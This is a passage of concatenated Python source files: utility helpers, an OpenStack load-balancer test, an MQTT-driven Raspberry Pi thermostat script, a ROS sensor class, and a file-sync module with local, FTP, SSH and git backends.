    returns an empty list when nothing importable is found.
    """
    directory, filename = os.path.split(path)
    name, ext = os.path.splitext(filename)
    names_to_import = []
    # Directory temporarily added to sys.path for plain .py files.
    tmp_python_path = None
    if ext in ('.py',):  # , '.pyc'):
        if directory not in sys.path:
            tmp_python_path = directory
        names_to_import.append(name)
        if ext == '.py':  # Ensure that no pyc file will be reused
            cache_file = cache_from_source(path)
            with ignoring(OSError):
                os.remove(cache_file)
    if ext in ('.egg', '.zip', '.pyz'):
        if path not in sys.path:
            sys.path.insert(0, path)
        if ext == '.egg':
            # Eggs may bundle several distributions; import each of them.
            import pkg_resources
            pkgs = pkg_resources.find_distributions(path)
            for pkg in pkgs:
                names_to_import.append(pkg.project_name)
        elif ext in ('.zip', '.pyz'):
            names_to_import.append(name)
    loaded = []
    if not names_to_import:
        logger.warning("Found nothing to import from %s", filename)
    else:
        invalidate_caches()
        if tmp_python_path is not None:
            sys.path.insert(0, tmp_python_path)
        try:
            for name in names_to_import:
                logger.info("Reload module %s from %s file", name, ext)
                loaded.append(reload(import_module(name)))
        finally:
            # Undo the temporary sys.path change regardless of failures.
            if tmp_python_path is not None:
                sys.path.remove(tmp_python_path)
    return loaded
class itemgetter(object):
    """A picklable itemgetter.

    Examples
    --------
    >>> data = [0, 1, 2]
    >>> get_1 = itemgetter(1)
    >>> get_1(data)
    1
    """
    __slots__ = ('index',)

    def __init__(self, index):
        self.index = index

    def __call__(self, obj):
        return obj[self.index]

    def __reduce__(self):
        # Rebuild from the stored index -- this is what makes it picklable
        # (operator.itemgetter is not, on some Python versions).
        return (itemgetter, (self.index,))
def format_bytes(n):
    """ Format bytes as text

    >>> format_bytes(1)
    '1 B'
    >>> format_bytes(1234)
    '1.23 kB'
    >>> format_bytes(12345678)
    '12.35 MB'
    >>> format_bytes(1234567890)
    '1.23 GB'
    >>> format_bytes(1234567890000)
    '1.23 TB'
    >>> format_bytes(1234567890000000)
    '1.23 PB'
    """
    # Use >= so that exact powers pick the larger unit: previously
    # format_bytes(10**15) rendered as '1000.00 TB' instead of '1.00 PB'.
    if n >= 1e15:
        return '%0.2f PB' % (n / 1e15)
    if n >= 1e12:
        return '%0.2f TB' % (n / 1e12)
    if n >= 1e9:
        return '%0.2f GB' % (n / 1e9)
    if n >= 1e6:
        return '%0.2f MB' % (n / 1e6)
    if n >= 1e3:
        return '%0.2f kB' % (n / 1e3)
    return '%d B' % n
# Canonical unit table: decimal (kB..PB), binary (KiB..PiB) and bare bytes.
byte_sizes = {
    'kB': 10**3, 'MB': 10**6, 'GB': 10**9, 'TB': 10**12, 'PB': 10**15,
    'KiB': 2**10, 'MiB': 2**20, 'GiB': 2**30, 'TiB': 2**40, 'PiB': 2**50,
    'B': 1, '': 1,
}
byte_sizes = {k.lower(): v for k, v in byte_sizes.items()}
# Single-letter aliases for decimal units ('k', 'm', ...) ...
byte_sizes.update({k[0]: v for k, v in byte_sizes.items() if k and 'i' not in k})
# ... and 'ki', 'mi', ... aliases for the binary units.
byte_sizes.update({k[:-1]: v for k, v in byte_sizes.items() if k and 'i' in k})

def parse_bytes(s):
    """ Parse byte string to numbers

    >>> parse_bytes('100')
    100
    >>> parse_bytes('100 MB')
    100000000
    >>> parse_bytes('100M')
    100000000
    >>> parse_bytes('5kB')
    5000
    >>> parse_bytes('5.4 kB')
    5400
    >>> parse_bytes('1kiB')
    1024
    >>> parse_bytes('1e6')
    1000000
    >>> parse_bytes('1e6 kB')
    1000000000
    >>> parse_bytes('MB')
    1000000
    """
    s = s.replace(' ', '')
    if not s[0].isdigit():
        # Bare unit such as 'MB' means one of that unit.
        s = '1' + s
    # Split off the trailing alphabetic unit suffix.
    i = len(s)
    while i > 0 and s[i - 1].isalpha():
        i -= 1
    n = float(s[:i])
    multiplier = byte_sizes[s[i:].lower()]
    return int(n * multiplier)
# Seconds per unit, keyed by abbreviation ...
timedelta_sizes = {
    's': 1,
    'ms': 1e-3,
    'us': 1e-6,
    'ns': 1e-9,
    'm': 60,
    'h': 3600,
    'd': 3600 * 24,
}
# ... and by full word (singular and plural), in any letter case.
tds2 = {
    'second': 1,
    'minute': 60,
    'hour': 60 * 60,
    'day': 60 * 60 * 24,
    'millisecond': 1e-3,
    'microsecond': 1e-6,
    'nanosecond': 1e-9,
}
tds2.update({k + 's': v for k, v in tds2.items()})
timedelta_sizes.update(tds2)
timedelta_sizes.update({k.upper(): v for k, v in timedelta_sizes.items()})

def parse_timedelta(s, default='seconds'):
    """ Parse timedelta string to number of seconds

    Examples
    --------
    >>> parse_timedelta('3s')
    3
    >>> parse_timedelta('3.5 seconds')
    3.5
    >>> parse_timedelta('300ms')
    0.3
    >>> parse_timedelta(timedelta(seconds=3))  # also supports timedeltas
    3
    """
    if isinstance(s, timedelta):
        return s.total_seconds()
    if isinstance(s, Number):
        s = str(s)
    s = s.replace(' ', '')
    if not s[0].isdigit():
        s = '1' + s
    # Split off the trailing alphabetic unit suffix.
    i = len(s)
    while i > 0 and s[i - 1].isalpha():
        i -= 1
    n = float(s[:i])
    unit = s[i:] or default
    result = n * timedelta_sizes[unit.lower()]
    # Return an int when the value is whole.
    return int(result) if int(result) == result else result
def asciitable(columns, rows):
    """Formats an ascii table for given columns and rows.

    Parameters
    ----------
    columns : list
        The column names
    rows : list of tuples
        The rows in the table. Each tuple must be the same length as
        ``columns``.
    """
    rows = [tuple(str(cell) for cell in row) for row in rows]
    columns = tuple(str(name) for name in columns)
    # Each column is as wide as its widest cell or its header.
    widths = tuple(max(max(map(len, col)), len(name))
                   for col, name in zip(zip(*rows), columns))
    row_template = ('|' + (' %%-%ds |' * len(columns))) % widths
    header = row_template % tuple(columns)
    bar = '+%s+' % '+'.join('-' * (w + 2) for w in widths)
    body = '\n'.join(row_template % row for row in rows)
    return '\n'.join([bar, header, bar, body, bar])
# nbytes(frame): byte length of bytes-like objects and memoryviews.  The
# PY2 variant must also handle `buffer` and memoryviews without an
# `nbytes` attribute.
if PY2:
    def nbytes(frame, _bytes_like=(bytes, bytearray, buffer)):  # noqa: F821
        """ Number of bytes of a frame or memoryview """
        if isinstance(frame, _bytes_like):
            return len(frame)
        elif isinstance(frame, memoryview):
            if frame.shape is None:
                return frame.itemsize
            else:
                # Product of dimensions times item size.
                return functools.reduce(operator.mul, frame.shape,
                                        frame.itemsize)
        else:
            return frame.nbytes
else:
    def nbytes(frame, _bytes_like=(bytes, bytearray)):
        """ Number of bytes of a frame or memoryview """
        if isinstance(frame, _bytes_like):
            return len(frame)
        else:
            try:
                return frame.nbytes
            except AttributeError:
                return len(frame)
def PeriodicCallback(callback, callback_time, io_loop=None):
    """
    Wrapper around tornado.IOLoop.PeriodicCallback, for compatibility
    with removal of the `io_loop` parameter in Tornado 5.0.
    """
    if tornado.version_info >= (5,):
        # Tornado >= 5 always uses the current IOLoop; io_loop is ignored.
        return tornado.ioloop.PeriodicCallback(callback, callback_time)
    else:
        return tornado.ioloop.PeriodicCallback(callback, callback_time, io_loop)
@contextmanager
def time_warn(duration, text):
    """Print a 'TIME WARNING' line when the wrapped block takes longer
    than *duration* seconds."""
    start = time()
    yield
    elapsed = time() - start
    if elapsed > duration:
        print('TIME WARNING', text, elapsed)
def json_load_robust(fn, load=json.load):
    """ Reads a JSON file from disk that may be being written as we read

    Waits for the file to appear, then retries parsing up to ten times
    (the writer may still be mid-write).  Returns None when no truthy
    payload could be read.
    """
    while not os.path.exists(fn):
        sleep(0.01)
    for _attempt in range(10):
        try:
            with open(fn) as f:
                data = load(f)
        except (ValueError, KeyError):  # race with writing process
            data = None
        if data:
            return data
        sleep(0.1)
def format_time(n):
    """ format integers as time
    >>> format_time(1)
    '1.00 s'
    >>> format_time(0.001234)
    '1.23 ms'
    >>> format_time(0.00012345)
    '123.45 us'
    >>> format_time(123.456)
    '123.46 s'
    """
    if n >= 1:
        return '%.2f s' % n
    elif n >= 1e-3:
        return '%.2f ms' % (n * 1e3)
    else:
        return '%.2f us' % (n * 1e6)
class DequeHandler(logging.Handler):
    """ A logging.Handler that records records into a deque """
    # Track every live handler so clear_all_instances() can reach them
    # without keeping them alive.
    _instances = weakref.WeakSet()

    def __init__(self, *args, **kwargs):
        maxlen = kwargs.pop('n', 10000)
        self.deque = deque(maxlen=maxlen)
        super(DequeHandler, self).__init__(*args, **kwargs)
        self._instances.add(self)

    def emit(self, record):
        # Remember the record; the oldest entries fall off automatically.
        self.deque.append(record)

    def clear(self):
        """
        Clear internal storage.
        """
        self.deque.clear()

    @classmethod
    def clear_all_instances(cls):
        """
        Clear the internal storage of all live DequeHandlers.
        """
        for handler in list(cls._instances):
            handler.clear()
def reset_logger_locks():
    """ Python 2's logger's locks don't survive a fork event
    https://github.com/dask/distributed/issues/1491
    """
    for name in list(logging.Logger.manager.loggerDict):
        for handler in logging.getLogger(name).handlers:
            handler.createLock()
# Only bother if asyncio has been loaded by Tornado
if 'asyncio' in sys.modules and tornado.version_info[0] >= 5:
    jupyter_event_loop_initialized = False
    if 'notebook' in sys.modules:
        import traitlets
        from notebook.notebookapp import NotebookApp
        # Inside a running Jupyter notebook server the event loop policy is
        # already configured -- don't clobber it.
        jupyter_event_loop_initialized = (
            traitlets.config.Application.initialized() and
            isinstance(traitlets.config.Application.instance(), NotebookApp)
        )
    if not jupyter_event_loop_initialized:
        import asyncio
        import tornado.platform.asyncio
        # Let any thread get/create an asyncio event loop on demand.
        asyncio.set_event_loop_policy(tornado.platform.asyncio.AnyThreadEventLoopPolicy())
def has_keyword(func, keyword):
    """Return True when *func* accepts a parameter named *keyword*."""
    if PY3:
        return keyword in inspect.signature(func).parameters
    else:
        # https://stackoverflow.com/questions/50100498/determine-keywords-of-a-tornado-coroutine
        if gen.is_coroutine_function(func):
            func = func.__wrapped__
        return keyword in inspect.getargspec(func).args

# Introspection is comparatively slow; memoize when lru_cache is available.
if lru_cache:
    has_keyword = lru_cache(1000)(has_keyword)
# from bokeh.palettes import viridis
# palette = viridis(18)
# 18-colour viridis palette, inlined to avoid a bokeh dependency.
palette = ['#440154', '#471669', '#472A79', '#433C84', '#3C4D8A', '#355D8C',
           '#2E6C8E', '#287A8E', '#23898D', '#1E978A', '#20A585', '#2EB27C',
           '#45BF6F', '#64CB5D', '#88D547', '#AFDC2E', '#D7E219', '#FDE724']

@toolz.memoize
def color_of(x, palette=palette):
    """Deterministically map *x* to a palette colour via an md5 hash of
    its string form."""
    h = md5(str(x).encode())
    n = int(h.hexdigest()[:8], 16)
    return palette[n % len(palette)]
def iscoroutinefunction(f):
    """True when *f* is a Tornado coroutine function or (on Python 3.5+)
    a native ``async def`` coroutine function."""
    if gen.is_coroutine_function(f):
        return True
    return sys.version_info >= (3, 5) and inspect.iscoroutinefunction(f)
|
test_ceate_listener.py | # -*- coding: utf-8 -*-
"""
Web Console Api Client
"""
# from django.test import TestCase
# from api_tests.test_api_request import RequestClient
# from BareMetalControllerBackend.conf.env import env_config
from baremetal_service import handler
# from common.lark_common.model.common_model import ResponseObj
# from rest_framework import viewsets
import threading
from common import utils
import time
from django.test import TestCase
class testLb(TestCase):
    """Exercises load-balancer pool update and delete concurrently."""

    def delete_test1(self):
        # Delete a specific LB pool using an admin client.
        openstack_client = utils.get_admin_client()
        pool_delete = openstack_client.load_balancer.delete_pool("17ba943d-1d96-40d5-a2ed-b017f43e4ae5")

    def update_test1(self):
        # Rename a specific LB pool using an admin client.
        openstack_client = utils.get_admin_client()
        pool_update = openstack_client.load_balancer.update_pool("ab82c371-5d4d-4f5b-a721-fad9f89ba10e",
                                                                 name="ding_test_update")

    def test(self):
        # BUG FIX: the targets were previously *called* at Thread creation
        # (target=self.update_test1()), so the work ran serially in this
        # thread and each Thread received None as its target.  Pass the
        # bound methods themselves so the threads actually do the work.
        threads = [
            threading.Thread(target=self.update_test1),
            threading.Thread(target=self.delete_test1),
        ]
        for t in threads:
            print("%s: %s" % (t, time.ctime(time.time())))
            t.start()
        # Wait for both operations before declaring success.
        for t in threads:
            t.join()
        print("删除成功")
|
main.py | from thermostat import thermostat
import RPi.GPIO as GPIO
import threading
import time
import paho.mqtt.client as mqtt
import argparse
import os
def thread2():
    """GPIO worker: replay the thermostat's (a, b) pin-step list onto the
    two configured output pins, one step per configured delay."""
    global thermostat_obj
    while True:
        if thermostat_obj.valid_list():
            l = thermostat_obj.get_list()
            for a, b in l:
                # a/b drive the two thermostat pins for this step --
                # presumably stepper/relay control; confirm in thermostat.py.
                GPIO.output(int(args.thermostat_pin_a), a)
                GPIO.output(int(args.thermostat_pin_b), b)
                time.sleep(float(args.thermostat_delay))
def thread1():
    """MQTT worker: connect to the broker (retrying until reachable) and
    process network traffic forever; reconnect if loop_forever returns."""
    global client
    while True:
        client.on_connect = on_connect
        client.on_message = on_message
        while True:
            try:
                client.connect(args.mqtt_server_ip, int(args.mqtt_server_port), 60)
                break
            except Exception as e:
                # Broker not reachable yet.  FIX: sleep between attempts --
                # the previous retry loop busy-spun a full CPU core.
                print(e)
                time.sleep(1)
        # Blocking call that processes network traffic, dispatches callbacks and
        # handles reconnecting.
        # Other loop*() functions are available that give a threaded interface and a
        # manual interface.
        client.loop_forever()
# The callback for when the client receives a CONNACK response from the server.
def on_connect(client, userdata, flags, rc):
    """paho-mqtt callback: fired when the broker answers CONNECT with CONNACK.

    rc is the connection result code (0 = success).
    """
    print("Connected with result code "+str(rc))
    # Subscribing in on_connect() means that if we lose the connection and
    # reconnect then subscriptions will be renewed.
    client.subscribe(args.mqtt_topic_set_temperature)
# The callback for when a PUBLISH message is received from the server.
def on_message(client, userdata, msg):
    """paho-mqtt callback: handle a PUBLISH from the broker.

    On the set-temperature topic: forward the decoded float to the shared
    thermostat object, then publish an HH:MM:SS acknowledgement timestamp
    on the ack topic.
    """
    global thermostat_obj
    print(msg.topic + " "+ msg.payload.decode("utf-8"))
    if msg.topic == args.mqtt_topic_set_temperature:
        temperature = float(msg.payload.decode("utf-8"))
        thermostat_obj.set_temperature(temperature)
        # Timestamp pieces for the acknowledgement payload.
        hours = time.strftime("%H")
        minutes = time.strftime("%M")
        seconds = time.strftime("%S")
        client.publish(args.mqtt_topic_ack_temperature, hours + ":" + minutes + ":" + seconds, qos=0, retain=False)
# Command-line configuration: broker address, topics, GPIO pins, step delay.
parser = argparse.ArgumentParser()
parser.add_argument("--mqtt_server_ip", help="")
parser.add_argument("--mqtt_server_port", help="")
parser.add_argument("--mqtt_topic_set_temperature", help="")
parser.add_argument("--mqtt_topic_ack_temperature", help="")
parser.add_argument("--thermostat_pin_a", help="")
parser.add_argument("--thermostat_pin_b", help="")
parser.add_argument("--thermostat_delay", help="")
args = parser.parse_args()
# GPIO setup: BOARD pin numbering, both thermostat pins driven as outputs.
GPIO.setmode(GPIO.BOARD)
GPIO.setup(int(args.thermostat_pin_a), GPIO.OUT)
GPIO.setup(int(args.thermostat_pin_b), GPIO.OUT)
# Shared state used by both worker threads.
thermostat_obj = thermostat()
client = mqtt.Client()
# thread1 services MQTT; thread2 drives the GPIO pins.
t1= threading.Thread(target=thread1)
t2= threading.Thread(target=thread2)
t1.start()
# Give the MQTT thread a head start before driving the pins.
time.sleep(1)
t2.start()
|
class_ros_sensor.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
PHM Ros Sensor Class
"""
import rospy
from threading import Thread
import roslib.message
import roslib.names
class ROSSensor:
    """
    Ros Sensor Class

    Subscribes to *topic* from a background thread and mirrors the latest
    received reading into ``self.data``.
    """
    def __init__(self, topic):
        self.name = topic                  # topic name this sensor watches
        self.error = None                  # reserved for error reporting
        self.data = None                   # latest value received, or None
        self.topic_message_type = None     # str() of the resolved message class
        self.thread = Thread(target=self.main_func, args=(self.name,))
        self.thread.start()

    def main_func(self, topic):
        """
        Ros Sensor Main Function

        Resolve the topic's message type and subscribe with _ros_cb.
        """
        try:
            topic_type, real_topic, fields = self.get_topic_type(topic)
            if topic_type is not None:
                data_class = roslib.message.get_message_class(topic_type)
                self.topic_message_type = str(data_class)
                rospy.Subscriber(real_topic, data_class, self._ros_cb)
            else:
                print("Can not resolve topic type of %s" % topic)
        except ValueError as err:
            print("ROSSensor Class Error!\n")
            print(err)

    def _ros_cb(self, msg):
        """
        Ros Sensor Callback Function

        Copy the value field matching the resolved message type into self.data.
        """
        try:
            if "sensor_msgs.msg._Temperature.Temperature" in self.topic_message_type:
                self.data = msg.temperature
            elif "agv_msgs.msg._CurrentData.CurrentData" in self.topic_message_type:
                self.data = msg.current_data
            elif "agv_msgs.msg._VoltageData.VoltageData" in self.topic_message_type:
                self.data = msg.voltage_data
            elif "agv_msgs.msg._PowerData.PowerData" in self.topic_message_type:
                self.data = msg.power_data
            elif "std_msgs" in self.topic_message_type:
                self.data = msg.data
            else:
                self.data = None
        except AttributeError as err:
            print("Invalid topic spec [%s]: %s" % (self.name, str(err)))

    def stop_thread_func(self):
        """
        Ros Sensor Stop Thread Function
        """
        # BUG FIX: the abort flag was previously set *after* join() returned,
        # when the worker had already finished; set it first so the worker
        # could observe it (NOTE(review): the worker does not currently poll
        # this flag -- confirm intended use).
        self.thread.should_abort_immediately = True
        self.thread.join()

    @classmethod
    def _get_topic_type(cls, topic):
        """
        Private Get Topic Type Function

        Returns (topic_type, real_topic, fields) or (None, None, None).
        """
        try:
            val = rospy.get_published_topics()
        except Exception as err:
            print("unable to get list of topics from master")
            print(err)
            # BUG FIX: ``val`` was left unbound here and the code fell
            # through to the list comprehension, raising a second error.
            return None, None, None
        matches = [(tpc, t_type) for tpc, t_type in val if tpc == topic or topic.startswith(tpc + '/')]
        if matches:
            tpc, t_type = matches[0]
            if t_type == roslib.names.ANYTYPE:
                return None, None, None
            if t_type == topic:
                # BUG FIX: previously returned a 2-tuple here, breaking the
                # 3-way unpack in get_topic_type().
                return t_type, None, None
            return t_type, tpc, topic[len(tpc):]
        else:
            return None, None, None

    def get_topic_type(self, topic):
        """
        Get Topic Type Function
        """
        try:
            topic_type, real_topic, rest = self._get_topic_type(topic)
            if topic_type:
                return topic_type, real_topic, rest
            else:
                return None, None, None
        except Exception as err:
            print("get_topic_type Error!")
            print(err)
            # BUG FIX: previously returned None implicitly, which the caller
            # cannot unpack; keep the 3-tuple contract.
            return None, None, None
|
locations.py | from taters import lazy_file, pipe, read_all, read_all_to, tee
import errno
import ftplib
import furl
import os
import paramiko
import tarfile
import urllib
import sh
import socket
import stat
import threading
def _parse_url( url ):
    '''Wrap a raw URL string in a furl object.'''
    parsed = furl.furl( url )
    return parsed
def _decode_furl_path( path ):
    '''decodes furl.Path to unicode string'''
    raw = str( path )
    return urllib.unquote( raw ).decode( 'utf8' )
class location( object ):
    '''Base Location

    Abstract interface shared by every concrete location (local, ftp, ssh,
    git, ...).  Subclasses override the raising stub methods below.'''
    def __init__( self, url ):
        # Accept either a URL string or an already-parsed furl object.
        if isinstance( url, basestring ):
            url = _parse_url( url )
        self.url = url
    def sub_location( self, path ):
        '''Return a location of the same class rooted at *path* below this one.'''
        url = self.url.copy().add( path = path )
        return self.__class__( url )
    def _full_path( self, path ):
        '''Decoded absolute path of *path* under this location.'''
        return _decode_furl_path( self.url.copy().path.add( path ) )
    # --- abstract interface -------------------------------------------------
    # BUG FIX: these previously did ``raise NotImplemented``.  NotImplemented
    # is a sentinel *value*, not an exception class, so raising it produces a
    # confusing TypeError; NotImplementedError is the correct idiom.
    def _listdir( self ):
        raise NotImplementedError
    def isdir( self, path ):
        raise NotImplementedError
    def mkdirs( self, path ):
        raise NotImplementedError
    def open( self, path, *a, **kw ):
        raise NotImplementedError
    def stat( self, path ):
        raise NotImplementedError
    def exists( self, path ):
        raise NotImplementedError
    def get( self, path ):
        raise NotImplementedError
    def put( self, f ):
        raise NotImplementedError
    def rm( self, f ):
        raise NotImplementedError
    def source( self, recursive = False ):
        '''Yield files under this location, recursing into directories if asked.'''
        for path in self._listdir():
            if self.isdir( path ):
                if recursive:
                    for f in self.sub_location( path ).source( True ):
                        yield f.rename( os.path.join( path, f.name ) )
            else:
                yield self.get( path )
    def _overwrite( self, overwrite, f ):
        # ``overwrite`` may be a plain bool or a callable deciding per-file.
        return overwrite( self, f ) if callable( overwrite ) else overwrite
    def destination( self, files, overwrite = False ):
        '''Consume *files*, writing (or deleting) each one at this location.'''
        for f in files:
            if f.delete:
                self.rm( f )
            elif overwrite == True or not self.exists( f.name ) or self._overwrite( overwrite, f ):
                self.put( f )
class local( location ):
    '''Local Location
    Represents a location on your local filesystem'''
    def __init__( self, url = '.' ):
        super( local, self ).__init__( url )
    def _listdir( self ):
        # Yield the entries directly under this location's path.
        for path in os.listdir( _decode_furl_path( self.url.path ) ):
            yield path
    def isdir( self, path ):
        return os.path.isdir( self._full_path( path ) )
    def mkdirs( self, path ):
        os.makedirs( self._full_path( path ) )
    def open( self, path, *a, **kw ):
        return open( self._full_path( path ), *a, **kw )
    def stat( self, path ):
        return os.stat( self._full_path( path ) )
    def exists( self, path ):
        return os.path.exists( self._full_path( path ) )
    def get( self, path ):
        # Wrap in a lazy_file so the file is only opened when actually read,
        # and re-label it with its location-relative name.
        f = lazy_file( self._full_path( path ) )
        f.name = path
        return f
    def put( self, f ):
        print 'local:%s' % f.name
        # Ensure dest paths exist
        dirpath = os.path.dirname( f.name )
        if not self.exists( dirpath ):
            self.mkdirs( dirpath )
        with open( self._full_path( f.name ), 'wb' ) as dest:
            read_all_to( f, dest.write )
    def rm( self, f ):
        print 'local DELETE', f.name
        try:
            os.remove( self._full_path( f.name ) )
        except OSError:
            # Best-effort delete: the file may already be gone.
            pass
class remote( location ):
    '''Base Remote Location

    Adds a lazily-established connection on top of the base location.'''
    def __init__( self, url ):
        super( remote, self ).__init__( url )
        self._con = None
    @property
    def con( self ):
        '''The live connection, created on first access via connect().'''
        if not self._con:
            self.connect()
        return self._con
    def sub_location( self, path ):
        '''Child locations share this location's existing connection.'''
        child = super( remote, self ).sub_location( path )
        child._con = self._con
        return child
    def connect( self ):
        # Concrete subclasses establish self._con here.
        pass
class BadPassiveFTP( ftplib.FTP ):
    '''Use this instead of ftplib.FTP if the ftp server requires passive mode'''
    def makepasv( self ):
        # Ignore the (possibly unroutable) address the server advertises in
        # its PASV reply; reconnect to the host we originally dialled.
        advertised_host, port = ftplib.FTP.makepasv( self )
        resolved = socket.gethostbyname( self.host )
        return resolved, port
class ftp( remote ):
'''FTP Location
Represents a location on an FTP server'''
def __init__( self, url, passive = True, bad_passive_server = False, timeout = socket._GLOBAL_DEFAULT_TIMEOUT, retries = 3 ):
super( ftp, self ).__init__( url )
self.bad_passive_server = bad_passive_server
self.passive = passive
self.timeout = timeout
self.retries = retries
def connect( self ):
print 'C', self.url.url
if self.bad_passive_server:
self._con = ftplib.FTP( timeout = self.timeout )
else:
self._con = BadPassiveFTP( timeout = self.timeout )
self._con.connect( self.url.host, self.url.port )
self._con.login( urllib.unquote( self.url.username ), urllib.unquote( self.url.password ) )
self._con.set_pasv( self.passive )
def _remote_path( self, f ):
return os.path.join( self.url.path, os.path.dirname( f.name ) )
def _listdir( self ):
for path in self.con.nlst( _decode_furl_path( self.url.path ) ):
if path in [ '.', '..' ]:
continue
yield path
def isdir( self, path ):
full_path = self._full_path( path )
try:
self.con.cwd( full_path )
except ftplib.error_perm, e:
if e.message.endswith( 'Not a directory' ):
return False
raise e
return True
def _retry( self, func, *a, **kw ):
for t in range( self.retries ):
try:
func( *a, **kw )
except socket.timeout:
if t < self.retries:
print 'Timedout! Retrying (%s of %s)' % ( t + 1, self.retries - 1 )
continue
else:
print 'Timedout! Out of retries!'
raise
else:
break
def exists( self, path ):
try:
self.con.size( self._full_path( path ) )
except:
return False
return True
def get( self, path ):
print 'G', path
p = pipe( path )
full_path = self._full_path( path )
def run():
p.need_data.wait()
try:
self.con.cwd( os.path.dirname( full_path ) )
self._retry( self.con.retrbinary, 'RETR %s' % os.path.basename( full_path ), p.w.write )
except Exception as e:
p.w.write( e )
p.w.close()
threading.Thread( target = run ).start()
return p.r
def put( self, f ):
print 'P', f.name
dir_path = os.path.dirname( self._full_path( f.name ) )
try:
self.con.cwd( dir_path )
except ftplib.error_perm as e:
if e.message.startswith( '550' ):
self.mkdirs( os.path.dirname( f.name ) )
self.con.cwd( dir_path )
print '%s:%s' % ( self.url.host, f.name )
self._retry( self.con.storbinary, 'STOR %s' % os.path.basename( f.name ), f )
def rm( self, f ):
print 'R', f.name
dir_path = os.path.dirname( self._full_path( f.name ) )
try:
self.con.cwd( dir_path )
except Exception, e:
print 'FTP-ERROR: Could not change directory to', os.path.dirname( f.name )
print e
print 'FTP-ERROR: Could not delete', f.name
return
try:
print '%s DELETE %s' % ( self.url.host, f.name )
self.con.delete( os.path.basename( f.name ) )
except Exception, e:
print 'FTP-ERROR: Could not delete', f.name
print e
def mkdirs( self, path ):
full_path = self._full_path( path )
if full_path.startswith( '/' ):
full_path = full_path[1:]
if not full_path:
return
self.con.cwd( '/' )
last_existed = True
for segment in full_path.split( os.sep ):
if not last_existed or segment not in self.con.nlst():
print '+D', segment
self._retry( self.con.mkd, segment )
last_existed = False
self.con.cwd( segment )
class ssh( remote ):
    '''SSH Location
    Represents a location on an SSH server'''
    # Cached SFTP channel over the SSH connection (lazily opened).
    __sftp_con = None
    @property
    def _sftp_con( self ):
        if not self.__sftp_con:
            self.__sftp_con = self.con.open_sftp()
        return self.__sftp_con
    def connect( self ):
        print 'C', self.url.url
        self._con = paramiko.SSHClient()
        # Auto-accept unknown host keys (convenient, but skips verification).
        self._con.set_missing_host_key_policy( paramiko.AutoAddPolicy() )
        args = {}
        # Only pass credentials/port that were actually present in the URL.
        if self.url.port:
            args['port'] = self.url.port
        if self.url.username:
            args['username'] = self.url.username
        if self.url.password:
            args['password'] = self.url.password
        self._con.connect( self.url.host, **args )
    def _listdir( self ):
        for file_attrs in self._sftp_con.listdir_iter( _decode_furl_path( self.url.path ) ):
            yield file_attrs.filename
    def isdir( self, path ):
        return stat.S_ISDIR( self._sftp_con.stat( self._full_path( path ) ).st_mode )
    def exists( self, path ):
        full_path = self._full_path( path )
        try:
            self._sftp_con.stat( full_path )
        except IOError, e:
            # ENOENT means "no such file"; anything else is a real error.
            if e.errno == errno.ENOENT:
                return False
            raise
        else:
            return True
    def get( self, path ):
        full_path = self._full_path( path )
        print 'G', path
        p = pipe( path )
        def run():
            # Don't open the SFTP transfer until someone actually reads.
            p.need_data.wait()
            # Fresh SFTP channel per transfer so downloads can run in parallel.
            sftp = self.con.open_sftp()
            try:
                sftp.getfo( full_path, p.w, callback = self.report_progress )
            except Exception as e:
                p.w.write( e )
            p.w.close()
        threading.Thread( target = run ).start()
        return p.r
    def put( self, f ):
        print 'P', f.name
        sftp = self.con.open_sftp()
        dir_path = os.path.dirname( f.name )
        if not self.exists( dir_path ):
            self.mkdirs( dir_path )
        full_path = self._full_path( f.name )
        sftp.putfo( f, full_path, callback = self.report_progress )
    def report_progress( self, prog, of ):
        # Trailing comma + carriage return: rewrite the same console line.
        print '%s of %s\r' % ( prog, of ),
    def rm( self, f ):
        print 'R', f.name
        sftp = self.con.open_sftp()
        try:
            sftp.remove( self._full_path( f.name ) )
        except IOError:
            # Most likely file does not exist, no need to remove it then
            pass
    def mkdirs( self, path ):
        sftp = self.con.open_sftp()
        full_path = self._full_path( path )
        if full_path.startswith( '/' ):
            sftp.chdir( '/' )
            full_path = full_path[1:]
        cur_path = ''
        last_existed = True
        for p in full_path.split( os.sep ):
            cur_path = os.path.join( cur_path, p )
            # Probe each prefix until one is missing; from then on, create.
            if last_existed:
                try:
                    sftp.stat( cur_path )
                    continue
                except IOError:
                    pass
            last_existed = False
            print '+D', cur_path
            sftp.mkdir( cur_path )
class git( local ):
    '''GIT Location
    Represents a local git repository. Allows you to limit the files given in the source to files that where changed between two git revisions'''
    def __init__( self, url = '' ):
        super( git, self ).__init__( url )
        # Bake the repository path into every git invocation when one is given.
        if self.url.path:
            self.git = sh.git.bake( '-C', _decode_furl_path( self.url.path ) )
        else:
            self.git = sh.git
    def get_ref_commit( self, ref = 'HEAD' ):
        # Resolve a symbolic ref to its commit hash.
        return str( self.git( 'rev-parse', ref ) ).strip()
    def get_current_commit( self ):
        # Prefer the human-readable "describe"; fall back to the raw hash
        # when the repo has no tags (git describe exits with code 128).
        try:
            return str( self.git.describe() ).strip()
        except sh.ErrorReturnCode_128:
            return self.get_ref_commit()
    def _maybe_decode_unusual( self, name ):
        if name.startswith( '"' ):
            # Path is escaped due to "unusual" characters, unescape it (see git-config's man page under core.quotePath)
            return name[1:-1].decode('string-escape')
        return name
    def _listdir( self, from_commit = None, to_commit = None ):
        # Yields (action, filename) pairs; action is a git status letter
        # ('A' added, 'M' modified, 'D' deleted, ...).
        if from_commit is None:
            # List all files
            for f in self.git( "ls-tree", "--name-only", '-r', to_commit or 'HEAD', _iter = True, _tty_out = False ):
                yield 'A', self._maybe_decode_unusual( f.strip() )
        else:
            # List only changed files
            args = [ '--name-status', '--no-renames', '--color=never', from_commit ]
            if to_commit:
                args.append( to_commit )
            for f in self.git.diff( *args, _iter = True, _tty_out = False ):
                action, f = f.strip().split( '\t' )
                yield action, self._maybe_decode_unusual( f )
    def source( self, from_commit = None, to_commit = None, recursive = False, include_version = False ):
        '''Yield changed (or all) files; optionally recurse into submodules
        and append a ".version" pseudo-file holding the target commit.'''
        for mode, fname in self._listdir( from_commit, to_commit ):
            if mode != 'D' and recursive and self.isdir( fname ):
                # Encountered a submodule in recursive mode
                # Work out its from and to commits and yield the changed files
                if not self.exists( os.path.join( fname, '.git' ) ):
                    raise Exception, 'Submodule %s not checked out!' % fname
                # ls-tree output: "<mode> commit <sha>\t<name>" -- field [2] is the sha.
                sub_from = self.git( 'ls-tree', from_commit, fname ) if from_commit else None
                sub_from = sub_from.split()[2] if sub_from else None
